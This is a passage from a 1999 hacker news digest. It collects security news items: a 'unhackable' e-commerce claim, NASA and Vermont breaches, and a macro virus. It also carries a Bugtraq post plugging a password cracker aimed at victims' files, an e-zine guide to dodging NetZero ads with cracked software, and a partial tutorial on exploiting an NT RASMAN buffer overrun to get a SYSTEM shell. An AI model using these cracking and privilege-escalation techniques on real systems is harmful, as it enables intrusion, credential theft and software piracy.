hearing. If Schwartz's probation is revoked, he could receive two to 10 years in prison. ``How many times can you thumb your nose at the court and get away with it?'' Elliott asked. ``He would have had a very bright future with some company. Why couldn't he do something constructive with his time instead of trying to beat the system?'' ----- (The Houston Chronicle web site is at http://www.chron.com/ ) @HWA 43.0 ACTINIC ecommerce package claims to be 'unhackable' ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ Actinic Catalog 3.0 called "Unhackable" contributed by Weld Pond Actinic Software LLC has Actinic Catalog 3.0, a plug-and-play e-commerce software package. The company is making the claim that it uses unhackable technology. It almost sounds like an invitation. Will people ever learn that nothing is unhackable? It all depends on time and energy. Something says that the marketing department probably didn't run the press release by the engineers before they released it. Update: May 21st HNN rumours section reports that www.actinic.com was supposedly cracked...(unconfirmed) Excite News http://news.excite.com:80/news/bw/990517/nj-actinic-software Actinic Catalog 3.0 Offers Total Security for Online Shopping; "Unhackable" Technology Prevents Hackers from Accessing Online Ordering Information Updated 9:53 AM ET May 17, 1999 EAST BRUNSWICK, N.J. (BUSINESS WIRE) - Actinic Software LLC, a leading provider of plug-and-play e-commerce software, today announced that its flagship product, Actinic Catalog 3.0, offers total security for online shoppers. Catalog 3.0 is a low-cost, easy-to-use software package that provides all the tools for e-commerce merchants to rapidly build and deploy secure online stores. The software's military-strength security eliminates vulnerabilities for merchants and their customers, ensuring that sensitive information cannot be compromised. Recent breaches in e-commerce security have turned a critical eye to the safety of online shopping. Some platforms, whether ill-equipped or improperly installed, save customer order information in a decrypted file on the server, exposed to anyone with access to the Internet. This not only includes the experienced hacker, but the average Web surfer with the right search terms. Unlike other third-party e-commerce systems, Catalog 3.0 encrypts all financial details on the Web server, which is deleted once orders are downloaded to the merchant's PC. Using 128-bit encryption, approved for use by major banks, Catalog 3.0 guarantees complete protection for online shoppers. "To avoid placing confidential customer information in jeopardy, e-commerce platforms must cover all the bases when it comes to ensuring online security -- from protecting files stored on the Web server, to accounting for the possibility of human error," explained Kevin Grumball, CEO of Actinic Software. "Catalog offers an easy-to-use interface, and keeps sensitive information encrypted at all times, eliminating all possible security hazards for online shoppers." To ensure total e-commerce security, Catalog 3.0 encrypts sensitive data on the buyer's PC using a Java applet, and also operates with SSL sites. Credit-card purchases are securely processed through the site using 128-bit encryption. Orders are downloaded directly to the merchant's PC for processing. The Web server is used only as a mailbox, to which only the merchant holds the key. No sensitive data is ever visible on the server, and all details are stored safely on the merchant's PC, providing customers with the end-to-end security they need. Catalog 3.0 offers all the components necessary to build a fully secure e-commerce site. The total solution includes a Web-based catalog, electronic shopping cart, online ordering, expanded payment options, encrypted security, and more. Catalog 3.0 is available now, priced at $399. Contact Actinic for more details. About Actinic Software LLC Founded in 1996, Actinic Software LLC is located in East Brunswick, N.J., with offices in the UK. The company develops Internet commerce software solutions. Its flagship product, Actinic Catalog 3.0, is a secure, low-cost, and easy-to-use plug-and-play solution for the rapid deployment and maintenance of an e-commerce site. Visit Actinic Software on the Web at http://www.actinic.com. Contact: Actinic Software, East Brunswick Kevin Grumball, 732/238-8007 kgrumball@actinic.com or Springboard Communications Kevin McLaughlin, 732-863-1900 kmclaughlin@s-board.com @HWA 44.0 MP3's off the net? ~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ MP3 Web sites to be Reported contributed by Space Rogue M. Ken Co., Ltd.,a developer of electronic water marking technology, will begin on June 1st to list web sites that contain illegal MP3s. The company will offer these lists to companies that are seeking copyright infringements on the web, it will also publish this information on its web site. The service will use an agent developed by M. Ken. The agent can search and locate MP3 files on the Web. During a test over 400 illegal sites where found. AsiaBiz Tech http://www.nikkeibp.asiabiztech.com/wcs/leaf?CID=onair/asabt/news/70746 @HWA 45.0 Free DNS! ~~~~~~~~~ From HNN http://www.hackernews.com/ FREE DNS! contributed by ratko IHN is a project being built to bring people free host names and URL forwarding as well as many more features. Like the now defunct ml.org, IHN promises DNS for the masses. There is also free URL forwarding hosts, and soon to come, IRC Proxying. "Now you can go to any IRC server and have your domain show up as an IHN domain. Currently in progress..." domains include ihn.org, clan.net and darpa.org ... Internet Host Network http://www.ihn.org @HWA 46.0 pIRCHCrack cracks password in pirch.ini files ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Date: Fri, 14 May 1999 04:56:55 PDT Reply-To: Mike Arnold Sender: Bugtraq List From: Mike Arnold Subject: pIRCH32/98 Exploit To: BUGTRAQ@netspace.org pIRCH version 32 and 98 save the users NickName password onto disk in c:\pirch32\pirch.ini or c:\pirch98\pirch.ini depending on what version. pIRCH Encrypts the password but i have released a program that can crack the password if you supply the .ini you need to get the victims pirch.ini file somehow maybe Social Engineering or whatever, then run pIRCHCrack against it. The user may also use the same password for their ISP, E-mail ETC. pIRCHCrack is available at http://members.xoom.com/zaiman/pirchcrack.zip --Mike ______________________________________________________ Get Your Private, Free Email at http://www.hotmail.com @HWA 47.0 NASA vulnerable to attack ~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ NASA Vulnerable To Attack contributed by McIntyre The General Accounting Office released a report yesterday (Thursday) that labels 135 of 155 of NASAs mission-critical systems as not meeting the agency's own requirements for security. The GAO enlisted the help of the NSA to simulate an attack on NASA using publicly available tools such as war dialers. Although NASA performed an internal review of its information security policies last May that found many of the same problems identified by the GAO, few of the recommended fixes had been implemented. Satellite command and control systems as well as launch controls are not linked to the internet and where not at risk during these simulated attacks. MSNBC http://www.msnbc.com/news/271662.asp Federal Computer Week http://www.fcw.com:80/pubs/fcw/1999/0517/web-nasa-5-20-99.html MAY 20, 1999 . . . 17:20 EDT Federal Computer Week GAO unearths computer security weaknesses at NASA BY DIANE FRANK (dfrank@fcw.com) Many of NASA's mission-critical information systems are vulnerable to attack, and almost all the systems do not meet the agency's own requirements for risk assessment, according to a General Accounting Office report released today. In tests conducted by GAO at one of NASA's field centers, experts were able to penetrate several mission-critical systems, including one responsible for calculating the positioning data for spacecraft. "Having obtained access to these systems, we could have disrupted NASA's ongoing command and control operations and stolen, modified or destroyed system software and data," the report states. GAO attributed much of the success of the attacks to NASA's lack of consistent information security management and policies as suggested by GAO's 1998 Executive Guide. And although NASA performed a special review of its information security program last May that found many of the same problems identified by GAO, few of the recommended fixes have been started, according to the report. GAO recommended that NASA put in place an agencywide security program addressing five areas: assessing risks and evaluating needs; implementing policies and controls; monitoring compliance with policy and effectiveness of controls; providing computer security training; and coordinating responses to security incidents. @HWA 48.0 Vermont's Security Compromised ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by McIntyre Yet another Cold Fusion hole is responsible for the security breeches of the web site of the state of Vermont. Bob West, the state's deputy chief information officer, claimed the state's computers that contain the home page and other public documents are not considered secure against computer attack. (There are a lot of pretty funny, or pretty sad, quotes in this article.) HNN Cracked Pages Archive http://www.hackernews.com/archive/crackarch.html The Boston Globe http://www.boston.com/dailynews2/141/region/Hackers_get_into_state_of_VermP.shtml Hackers get into state of Vermont computer system By Wilson Ring, Associated Press, 05/21/99 09:48 MONTPELIER, Vt. (AP) - Hackers cracked into the state's computer system Thursday, inserting at least three unauthorized messages into it. State officials said they received no complaints from the public about anything that appeared on the state's World Wide Web site. A computer security official from Boston said that for at least four hours Thursday morning a visitor to the state's home page was greeted by a page entitled ''Hackfactor X'' that contained a series of profanities and the message, ''Well, I can see how well our tax dollars are being spent on computer security.'' Hidden deep into the state's system, which is not readily accessible to the public, was another message entitled ''A Changing World'' that was signed ''hacked for freedom,'' and another that carried the caption, ''use this only for good, not evil.'' State officials were initially unaware of the assault on their computers. But once the location of the messages were pointed out by The Associated Press they were erased within minutes. Bob West, the state's deputy chief information officer, said there was no evidence the main Web page was tampered with. ''I am not sure where that came from,'' West said of the report. ''I would have gotten e-mails like crazy if that had happened.'' But he was also unaware that the less public files had been tampered with until they were pointed out to him. ''Most people would never have found that,'' he said. In any event, the state's computers that contain the home page and other public documents are not considered secure against computer attack, West said. ''Anything on that box is backed up and is restorable and is not considered confidential,'' West said. If the system failed, ''it wouldn't stop any operation in state government.'' Critical state business - such as personnel and tax records - is done on computers that are protected by ''firewalls'' and are believed invulnerable to unauthorized access, West said. The hacker took advantage of the software that runs the state's computer servers, said Weld Pond, a computer security consultant with the Boston company l0pht. The vulnerability of the software has been well known, but it was installed on many computer systems years ago and officials never bothered to correct the problem, Pond said. Pond looked at the state's page and said it appeared it was hacked twice on Thursday. The last illegal visitor ''closed'' the hole that allowed the site to be hacked, he said. ''Hackers definitely close holes after they are in,'' Pond said ''They don't want somebody else in it.'' The attack on the state system was first reported on the computer Web site known as attrition.org. The site is used to point out to the information industry how vulnerable computer systems can be and to record those assaults for history. B.K. DeLong of Boston helps maintain the site. He said he got an e-mail message at about 4:30 a.m. pointing out the assault on the Vermont system. He said the untraceable e-mail was probably sent by the hacker, who wanted to highlight his or her achievement. DeLong said he saw the Hackfactor X site at about 8:30. It had been taken off the state system by about 9 a.m. ''They can insist all they want, but it's been seen,'' DeLong said of West's denial about the tampering. The site that DeLong said was posted in place of the state's traditional home page can still be viewed at www.attrition.org/mirror/attrition. Computer hacking is a federal crime, but Vermont's U.S. Attorney, Charles Tetzlaff, said Thursday he was unaware of the assault on the state's home page @HWA 49.0 NIST May Be Named Info Security Clearing House ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by erewhon The House Science Committee will soon push to update the 1989 Computer Security Act. The new bill will closely resemble the Computer Security Enhancement Act of 1997 which never made it out of the Senate. This new legislation would tap the National Institute of Standards and Technology (NIST) as the lead agency for information security. (What about NIPC, CERT, and the FBI? How many agencies do we need?) The new bill also push for increased federal use of commercial off-the-shelf products for security needs. Federal Computer Week http://www.fcw.com/pubs/fcw/1999/0517/web-security-5-20-99.html MAY 20, 1999 . . . 14:11 EDT House panel aims to bolster security law BY MARGRET JOHNSTON (margret_johnston@fcw.com) WASHINGTON, D.C. -- The House Science Committee plans to make another push to update a 1989 law that requires civilian agencies to take measures to protect their computer systems, according to Rep. Constance Morella (R-Md.), chairwoman of the Technology Subcommittee of the House Science Committee. The new bill, which could be introduced as early as next week, would revamp the 10-year-old Computer Security Act. The bill will closely resemble the Computer Security Enhancement Act of 1997, which the House passed only to have it die in the Senate last year, said Morella, speaking at a symposium sponsored by the SmartCard Forum. Like the 1997 bill, the proposed legislation would tap the National Institute of Standards and Technology as the lead agency for information security. The preceding bill also would have required NIST to promote federal use of commercial off-the-shelf products for civilian security needs. The committee first began its effort to revamp the existing law to reflect the proliferation of network technology that has left agency data more vulnerable to corruption and theft, Morella said in 1997. @HWA 50.0 097M.Tristate Macro Virus Contained ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by wdef-A Symantec and Network Associates have posted new definitions to eradicate the 097M.Tristate macro virus. This new virus also known as Triplicate and Crown cross-infects Microsoft Word documents, Excel spreadsheets, and PowerPoint presentations. The virus has the ability to destroy data and removes virus-warning protection from both Excel and Word. PC World http://www.pcworld.com/pcwtoday/article/0,1510,11064,00.html Hunters Contain Office Macro Virus Symantec, McAfee inoculate for 097M.Tristate macro virus. by Christian McIntosh, PC World May 20, 1999, 6:38 p.m. PT The heat of the race to detect and nullify new viruses appears second only to the contest among virus fighters to be first with the cure. Two antivirus leaders, Symantec and Network Associates' McAfee division, have nabbed a new macro virus that threatens files created by Microsoft Office applications. Both have posted new definitions that detect and eradicate the 097M.Tristate macro virus. You can download the new definitions for any Symantec antivirus product from LiveUpdate, the company's antivirus service, which pushes virus updates to registered Symantec customers. "It's a scheduled component that checks frequently for new virus threats," says Enrique Salem, Symantec's chief technology officer. Unregistered Symantec customers can get the new definitions from the Symantec AntiVirus Research Center on the company's Web site. You can also eradicate the 097M.Tristate virus using McAfee's VirusScan updated with the most recent definition file, available on the company's Web site. VirusScan also will prompt you to periodically update your virus definitions data. "Trendy" Macro Viruses Macro viruses similar to 097M.Tristate are popular among virus writers, according to Symantec officials. The 097M.Tristate macro virus cross-infects Microsoft Word documents, Excel spreadsheets, and PowerPoint presentations. The 097M.Tristate virus creates a viral workbook called BOOK1 in the Excel startup directory. In PowerPoint, 097M.Tristate adds a viral module that's linked to the AutoShape object covering an entire slide. During its final leg, 097M.Tristate replaces the content of an infected Word document with viral code. Once considered the exclusive domain of research labs, macro viruses have transitioned into general circulation. Despite its prolific reproduction, Symantec classifies 097M.Triplicate as rare, saying it has yet to spread beyond the United States. The 097M.Tristate macro virus, also known as Triplicate and Crown, is currently the eighth most common virus submitted to Symantec's lab. The company's Scan & Deliver system has received 132 submissions of the 097M.Tristate virus in the past two weeks. McAfee classifies 097M.Tristate as high risk. The virus apparently removes virus-warning protection from both Excel and Word. @HWA 51.0 "Hackers" Ruin Online Poll ~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by The Silicon Sorceror According to the Toronto Star, "online hackers" used ballot stuffing to spoil an online poll to find the popular winner of Ontario's political candidate debate. The poll was designed so that each person could vote only once, but apparently it wasn't designed well enough and "some political junkies with computer skills had the time to write programs defeating the precautions" (Translation: Somebody clicked their mouse button about 5 times and banged out a script). The Toronto Star http://www.thestar.com/editorial/news/990520NEW15b_NA-WEB20.html (article moved) 52.0 DSC v1.01 Released ~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by {b|4iz3} DSC v1.01 has been released. DSC is a new e-zine for those who are learning the "first steps" into learning computer security. A Good setup and easy read ablility are among the best parts of this new e-zine. Get yours today. DSC v1.01 Released http://bl4iz3.faithweb.com/hacking/ Sample article on 'free internet' access from the DSC website; _________________________________________________________________________________________ | -- ---- | | g3t fr33 1nt3rn3t 4cc3ss __ | | | \/ || | fr0m {b|4iz3} of the -=D3P SQU4D CR3W=- -- | | | /\ || | http://bl4iz3.faithweb.com/ -- ---- | |_________________________________________________________________________________________| | | | ________________________________________________________________ | | |\ ____________________________________________________________ /| | | | |\ ________________________________________________________ /| | | | | | | _________________ _______________ ________________ | | | | | | | | |_______________ \| ____________|/ ______________| | | | | | | | | \ | |____________/ / | | | | | | | | | |_____________ | | | | | | | | | | _______________/ /_____________| | \______________ | | | | | | | | |_________________/|_______________|\________________| | | | | | | | |________________________________________________________| | | | | | |/__________________________________________________________\| | | | |/______________________________________________________________\| | | | | ****************************************** | | ******* -=D3P SQU4D CR3W=- ******* | | ****************************************** | | *** http://bl4iz3.faithweb.com *** | | ****************************************** | | *** th1s h4ck pr0v1d3d t0 y0u by: *** | | * {b|4iz3}0f th3 -=D3P SQU4D CR3W=- * | | ****************************************** | | | | _________________________________________________________________________________ | | |_________________________________________________________________________________| | | | | _________________________________________________________________________________ | | | _____________________________________________________________________________ | | | | | -- ---- | | | | | | h0w t0 g3t fr33 1nt3rn3t 4cc3ss __ | | | \/ || | | | | | br0ught t0 y0u by {b|4iz3}! -- | | | /\ || | | | | | -- ---- | | | | | |---------------------------------------------------------------------------- | | | | | | | | | | | | C:\>cd progra~1 | | | | | | | | | | | | C:\program files\> | | | | | | | | | | | | C:\program files\>NetZero.bat | | | | | | | | | | | | C:\> Free Internet provided by: | | | | | | -=D3P SQU4D CR3W=- | | | | | | http://bl4iz3.faithweb.com | | | | | | Bad command or file name | | | | | | Bad command or file name | | | | | | | | | | | | | | | | | |_____________________________________________________________________________| | | | | | | | | | Status: Running Program Files | | Time Elapsed: 00:43 | | | | |_________________________________________________________________________________| | | | | _________________________________________________________________________________ | | |_________________________________________________________________________________| | | | | To get free internet access, please follow the following steps: | | | | 1)Download NetZero(A FREE ISP) at "http://members.xoom.com/HFDWPack/files/NetZero.exe" | | | | 2)Setup NetZero, and install into DEFAULT location. | | a)Sign on for the first time and answer all those stupid questions(or they'll deny | | you service) | | | | 3)Download ConSeal PC Firewall. at "http://bl4iz3.faithweb.com/hacking/files/ | | ConSeal.exe" | | | | 4)Install ConSeal PC Firewall, set it up as custom, and BLOCK ALL ICMP (this will | | stop all the ads NetZero will try and send you). REMEMBER: Install into DEFAULT | | locations. | | | | 5)Download Conseal PC Firewall Crack. at "http://bl4iz3.faithweb.com/hacking/ | | files/ConSeal135Crack.zip | | a)Replace FRW.EXE in the zip file with FRW.EXE in "c:\program files". | | | | 6)Download NetZero batch file (YOU MUST SAVE THIS TO "c:\program files") create a | | link to this on the desktop, that way you can just double-click to free internet | | access anytime you want. | | | | 7)Now, every time you want to run your FREE internet access, just click on the | | NetZero batch file. | | | | _________________________________________________________________________________ | | |_________________________________________________________________________________| | | | | | | Now, to explain the glitches in their system: | | | | NetZero sends a command, I believe through ICMP, which turns the dialup | | program into an ad banner. This banner shows the ads which makes this service free. | | | | Now, the firewall blocks this command which turns the program into the ad banner. | | Therefore, the ad NEVER starts up, and as far as Net Zero knows, the command went | | through and BLAM, you're running a free ISP with NO ADS. | | | | I have not, as of this date, checked what makes this program change into the ad | | banner, and eventually, I will TRY and find or make a crack for NetZero so you | | won't have to go through with all this Firewall stuff. | | ________________________________________________________________________________________| | | | k0pywr0ng (k)1999 -=D3P SQU4D CR3W=- | | Check out http://bl4iz3.faithweb.com/kopywrong/ | |_________________________________________________________________________________________| 53.0 Laser Pointers Illegal? ~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Code Kid The San Francisco Housing and Social Policy Committee will soon classify laser pointers in the same category as spray paint, making it illegal for those under 18 to purchase or posses them. Since limiting the sale of spray paint cans has worked exceedingly well in preventing graffiti in major cities it is thought that a similar ban on laser pointers would be equally effective. San Francisco Examiner http://www.sfgate.com/cgi-bin/article.cgi?file=/examiner/archive/1999/05/20/EDITORIAL14125.dtl Use a laser, go to jail EXAMINER EDITORIAL WRITER May 20, 1999 CONSIDER the what-can-go-wrong-WILL-go-wrong provisions of Murphy's Law and its corollaries, such as the Rule of Toast by which the buttered side always hits the floor. Next comes the Law of Unintended Consequences, particularly the high-tech subsections that gave us e-mail spam, undumpable atomic waste, MTBE in our water, extortionate ATM fees and surrender of privacy to corporate hackers. Question: What do you get when you marry the laws of Murphy and Unintended Consequences? Answer: The laser pointer. These ingenious devices, originally intended as high-tech aids to professors and lecturers, send little red beams as far as 1,500 feet. And, according to San Francisco Supervisor Michael Yaki, "These so-called toys can distract, annoy and even injure other people when misused." Accordingly, Yaki persuaded the board's Housing and Social Policy Committee on to approve Tuesday a proposed ordinance patterned after laws in New York and other cities. It would make it a crime to sell laser pointers to persons under age 18. It would compel storekeepers to keep them locked up - as with cans of spray paint suitable for graffiti and tags - to discourage teen shoplifters. It would make it a serious crime to point a beam at another person's face or, because of the possibility of a driver's temporary blindness, at a moving vehicle. Yes, it's true that the ban on sale of spray paint to juveniles didn't exactly put an end to tags and graffiti. And laser pointers are considerably less dangerous than the lethal handguns far too accessible to far too many kids. But we agree with Police Lt. Patricia Jackson, who called the pointers an annoyance with disruptive potential. The full board should approve Yaki's law and hope that it won't have unintended consequences of its own. ©1999 San Francisco Examiner Page A 26 @HWA 54.0 Exploiting NT buffer overruns ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNS http://www.net-security.org/ NT 4 BUFFER OVERRUNS by BHZ, Thursday 20th May 1999 on 10.50 pm CET David Litchfield reported to BugTraq a study on exploiting NT 4 Buffer Overruns. "This document is for educational purposes only and explains what a buffer overrun is and shows how they can be exploited on the Windows NT 4 operating system using RASMAN.EXE as a case study. We will take a look at Windows NT processes, virtual address space, the dynamics of a buffer overrun and cover certain key issues such as explaining what a stack is and what the ESP, EBP and EIP CPU registers are and do". Read the study below. Exploiting Windows NT 4 Buffer Overruns A Case Study: RASMAN.EXE Introduction This document is for educational purposes only and explains what a buffer overrun is and shows how they can be exploited on the Windows NT 4 operating system using RASMAN.EXE as a case study. We will take a look at Windows NT processes, virtual address space, the dynamics of a buffer overrun and cover certain key issues such as explaining what a stack is and what the ESP, EBP and EIP CPU registers are and do. With these covered we'll look into the buffer overrun found in RASMAN.EXE. This document may be freely copied and distributed only in its entirety and if credit is given. Cheers, David Litchfield What is a buffer overrun? A buffer overrun is when a program allocates a block of memory of a certain length and then tries to stuff too much data into the buffer, with the extra overflowing and overwritting possibly critical information crucial to the normal execution of the program. Consider the following source: #include int main ( ) { char name[31]; printf("Please type your name: "); gets(name); printf("Hello, %s", name); return 0; } When this source is compiled and turned into a program and the program is run it will assign a block of memory 32 bytes long to hold the name string. Under normal operation someone would type in their name, for instance "David", and the program would then print to the screen "Hello, David". David is 5 letters long, with each letter taking up a single byte. The end of a string, though, is denoted by a thing called a null terminator - which is basically a byte with a value of zero. So we need to add a null terminator to the end of the string making a total length of 6 bytes. It is clear that 6 bytes will fit into the 32 bytes set aside to store the name string. If however, instead of entering "David", we entered "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" that is 40 capital As, when the program reads in our input and places it in our buffer it overflows. 40 will definitely not fit into 32. It so happens that if we enter 40 As we completely overwrite the contents of a special CPU register known as the Instruction Pointer or EIP - the E stands for Extended by the way. A quick explanation of a register - a computer's processor has small memory storage units called registers. Access to the values held in these registers is very quick. These registers have special names and can hold memory addresses and variables. The EIP is one of these registers and holds the memory address of the next instruction to execute. What do I mean by instruction? A program contains a list of instructions for the processor to carry out in order for the program to do its job, much like a recipe contains instructions for a cook to carry out in order to make a cake. These instructions are known as operation codes or opcodes for short. So when a program is running and the processor is executing one of the program's instructions the EIP holds the memory address where the next instruction to be executed can be found. After the current instruction has been executed the processor goes to that memory address and pulls in the instruction found there and then increments the EIP and the executes that instruction. This process of pulling the opcode from the memory address pointed to by the EIP, then incrementing the EIP then executing that instruction continues until the program exits. Going back to our code, the fact that we have overwritten the EIP means that we can effectively tell the CPU to go to a memory address of our choosing and pull down the instruction found there and execute that. Because we are filling the buffer with As we overwrite the EIP with 0x41414141 - 41 is the hex value for a capital A. The processor then goes to address 0x41414141 and tries to read in the instruction found at that address. If there's no instruction there we get a thing known as an Access Violation. Most people will know of this as a message popping up saying something like "The Instruction at '0x41414141' referenced memory at '0x41414141'. The memory could not be read." If we had filled our buffer with Bs we would overwrite the EIP with 0x42424242 essentially telling the processor to go that that memory address to get the next instruction and more than likely we'd get the same Access Violation. Exploiting a buffer overrun. As you'll see later on, being able to overwrite the EIP is vital to exploiting a buffer overrun. When you exploit a buffer overrun you basically get the processor to execute instructions or code of your choosing getting the program to do something it would not normally do. You do this by pointing the EIP back into the buffer which you load with your own opcodes which are then executed. This begs the question , "Why would someone want to do this?" Windows NT, like UNIX systems, require a user to log into the system. Some users are very powerful, such as the Administrator and others are just your average normal user that aren't as powerful. If a normal user wanted to become equivalent to the Administrator and thus just as powerful with almost full control of the system they could exploit a buffer overrun to attain this. The problem is the buffer overrun needs to be in a process that has enough power and privileges to be able to make them an Administrator so there is no point in buffer overruning a process that they, the user themselves, have started. They need to buffer overrun a process started by the system and then get the process to execute their own arbitary code. The system account is very powerful, and if you can get a system process to do something, such as open a Command Prompt, then it will run with system privileges. In Windows NT, if a process starts a new child process then the child process normally inherits the access token of the parent process, normally because some processes can be started using the Win32 CreateProcessAsUser ( ) function that will start the new process under the security context of another user and thus the new process will have a different access token than the parent process. An Access Token is like a set of keys - they denote a user's rights and privileges that determine what they can and cannot do to the machine. An example of this is screen savers. The winlogon.exe system process is responsible for starting a user's screen saver. As oppossed to runing the screen saver in the security context of the system winlogon uses CreateProcessAsUser ( ) to start the screen saver in the security context of the currently logged on user. I digress - back to buffer overruns. In this case study we'll look at the buffer overrun in RASMAN.EXE, a system process, and get it to open a Windows NT Command Prompt. This Command Prompt will have the access token of the system account and so will any other processes started from it. But first a bit more on an NT process' virtual memory layout. A process embodies many things such as, amongst others, a running program, one or more threads of execution, the process' virtual address space and the dynamic link libraries (DLLs) the program uses. The process has 4 GB of virtual address space to use. Half of this is, from address 0x00000000 to 0x7FFFFFFF, private address space where the program, its DLLs and stack (or stacks in the case of a multihthreaded program) are found and the other half, address 0x80000000 to 0xFFFFFFFF is the system address space where such things as NTOSKRNL.EXE and the HAL are loaded. As a side note, this default behaviour can be changed as of service pack three - you can specify a switch in the boot.ini - /3GB - that will assign 3 GB as private address space and 1 GB as system address space. This is to boost the performance of programs, such as databases, the require large amounts of memory. When a program is run NT creates a new process. It loads the program's instructions and the DLLs the program uses into the private address space and marks the pages it uses as read-only. Any attempt to modify pages in memory marked as read only will cause an Access Violation. The first thread is started and a stack is initialised. The Stack What's the simplest way to describe a stack? Try this: Imagine a carpenter. He has tools, materials and instructions. To be able to make something though they need a workbench. The stack is similar to this workbench. It is a place where he can use his tools to shape and model his raw materials. He can put something down on the workbench, say waiting for the glue to dry on two bits of wood and do something else. When that task is complete he can come back to his two bits of wood and continue with that. The workbench is where most of the work is done. So too, in a process, the stack is where most things are done. It is a writeable area of memory that dynamically shrinks and grows as is needed or determined by the program's execution. When a programatic task is started it'll place data on the stack, whether these be strings, memory addresses, integers or whatever, then manipulate them and when the task has completed it will return the stack to its original state so that the next task can use it if it needs to. Working in this way the process interacts with the stack using a method known as Last In, First Out or LIFO. There are two registers that are crucial to the stack's functionality - they are used by the program to keep track of where data can be found in memory. These two registers are the ESP and the EBP. The ESP, or the Stack Pointer points to the top of the stack. The ESP contains the memory address where the top of the stack can be found. The ESP can be changed in a number of ways both indirectly and directly.When something is PUSHed onto the stack the ESP increases accordingly. When something is POPed off of the stack the ESP shrinks. The PUSH and POP operations modify the ESP indirectly. But then you can manipulate the ESP directly, with say an instruction of "SUB esp,04h" which pushes the stack out by four bytes or one word. For those that haven't yet been numbed into boardem, something may just have irked: how is it that you SUBtract 4 from the ESP and yet the ESP is pushed out? Well this is because the stack works backwards. The bottom of the stack uses a memory address higher than the top of the stack: ----------------0x12121212 Top of the stack ... ... ----------------0x121212FF Bottom of the stack Here we have definitive proof that the fathers of modern computing were indeed closet sadists or had shares in makers of paracetamol - occasionally they throw in gems like this to make that headache that bit more acute. When we say the stack increases in size the address held in the ESP decreases. Conversly when the stack size decreases the address held in the ESP increases. Reaching for the Asprin yet? Our second stack related register is known as the EBP or the Base Pointer. The EBP holds then memory address of the bottom of the stack - more accurately it points to a base point in the stack that we can use a reference point within a given programatic task. The EBP must have meaning to a given task and to facilitate this before the task's real business is started a setup procedure known as the "procedure prologue" is first completed. What this does is, firstly, save the current EBP by PUSHing it onto the stack. This is so that the processor and program will know where to pick up from after the currently executing task has completed. The ESP is then copied into the EBP thus creating a new Base Pointer that the currently executing task can use as a reference point irrespective of how the ESP changes during the task's execution. Continuing with this let's say an 11 character string was placed onto the stack - our EBP remains the same but the ESP has been pushed out by 12 bytes. Then say an address was PUSHed onto the stack - our ESP is pushed out by another 4 bytes, though our EBP still remains the same. Now let's say we needed to reference the 11 byte string - we can do this by using our EBP: we know the first byte of our string (the pointer to the string) is twelve bytes away from the EBP so we can reference this string's pointer by saying,"the address found at EBP minus 12". (Remember the stack goes from a higher address to a lower address) RASMAN and buffer overruns. Finding the buffer overrun The first thing you need to do to be able to exploit a buffer overrun is to a) know about an existing one or b) find your own one. In the case of RASMAN, the overrun was found by looking at the RAS functions and the structures the used. Notice that some of the functions, such as RasGetDialParams ( ), fill structures that contain characters arrays, much like char name[31] character array in the C code above. By playing around with rasphone.pbk file, the RAS Phone Book, where dialing details, such as the phone number to be dialed, are stored, you can root out these overruns. Make a phone book entry called "Internet", which dials into your ISP, dial it, and downloaded your mails. This is important as this adds to the Registry an entry for the domain name of your mail server as an Autodial location. That is, if you try to contact your mail server, from that point on, without being dialed into the Internet, the Connection manager would kick in and automatically dial for you. RASMAN is the process that handles this functionality. Once you have done this change the telephone number to a long string of As and then attempted to connect to your mail server, say, by opening Outlook Express. This causes RASMAN to read in from rasphone.pbk the telephone number to dial to be able to get to your mail server. But instead of the real telephone number the long string of As is read instead and fills a character array in the RAS_DIAL_PARAMS structure which overflows causing an Access Violation - at address 0x41414141. We've found a buffer overrun and, more exciting, overwritten the EIP. Finding where the EIP is overwritten By experimenting with the length of the "telephone number" we find that we overwrite the EIP with bytes 296,297,298 and 299 of our string. (You'll find that, if you are actually following this, you'll need to reboot the system after the overflow to be able to restart the service, and you'll have to end tasks such as AthenaWindow and msmin.exe.) Once we have found where we overwrite the EIP it is time to get out the debugger - the debugging capabilities of Visual C++ are very good. Attach to the RASMAN process and then get it to dial - or attempt to at least. Wait for the access violation. Analyze what's going on. Once the access violation has occured we need to look at the stack and the state of the CPU's registers. From this we can see that we also overwrite the EBP, which will come in handy later on and that the address of the first A of our "telephone number" is 0x015DF105. By getting RASMAN to access violate a number of times we find that the first A is always written to this address. This is the address we're going to set the EIP to so that the processor will look at that address for the next instrution to execute. We'll stuff the "telephone number" full of our own opcodes that will get RASMAN to do what we want it to do - our arbitary code. We then need to ask, "What do we want it to do?". Where do you want to go today? - What do you want to acheive? The best thing to do, as we need to be at the console to get this to work, is get RASMAN to open up a Command Prompt. From here we can run any program we want with system privileges. The easiest way to get a program to run a Command Prompt, or any other program for that matter is to use the system ( ) function. When the system ( ) function is called it looks at the value of the ComSpec environment variable, normally "c:\winnt\system32\cmd.exe" on Windows NT and executes that with a "/C" switch. The function passes cmd.exe a command to run and the "/C" switch tells cmd.exe to exit after the command has finished executing. If we pass "cmd.exe" as the command - system("cmd.exe"); - this will cause the system function to open up cmd.exe with the "/C" switch and execute cmd.exe - so we are running two instances of the command interpreter - however the second one won't exit until we tell it to ( and nor will the first until the second one has exited.) Rather than the placing the opcodes that actually form the system ( ) function in our exploit string it would be easier to simply call it. When you call a function you tell the program to go to a certain DLL that contains the code for the function you are calling. The use of DLLs means that programs can be smaller in size - rather than each program containing the necessary code for each function used they can call a shared DLL that does contain the code. DLLs are said to export functions - that is the DLL provides an address where a function can be found. The DLL also has a base address so the system knows where 